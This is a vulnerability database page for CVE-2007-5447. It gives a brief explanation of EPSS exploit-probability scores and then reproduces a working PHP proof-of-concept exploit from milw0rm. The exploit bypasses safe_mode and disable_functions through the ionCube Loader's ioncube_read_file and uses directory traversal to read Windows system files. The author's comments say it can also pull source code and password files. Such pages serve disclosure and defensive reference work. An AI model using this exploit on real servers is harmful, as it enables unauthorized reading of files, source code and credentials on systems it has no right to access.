CVE-2007-5447 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<?php //PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //Tested on xp Pro sp2 full patched, worked both from the cli and on apache //Technical details: //ionCube version: 6.5 //extension: ioncube_loader_win_5.2.dll (other may also be vulnerable) //url: www.ioncube.com //php.ini settings: //safe_mode = On //disable_functions = ioncube_read_file, readfile //Description: //This is useful to obtain juicy informations but also to retrieve source //code of php pages, password files, etc... you just need to change file path. //Anyway, don't worry, nobody will read your obfuscated code :) //greetz to: BlackLight for help me to understand better PHP //P.S. //This extension contains even an interesting ioncube_write_file function... if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!"); $path = str_repeat("..\\", 20); $MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :) $MyBoot_ioncube = ioncube_read_file($path."boot.ini"); echo $MyBoot_readfile; echo "<br><br>ionCube output:<br><br>"; echo $MyBoot_ioncube; ?> # milw0rm.com [2007-10-11]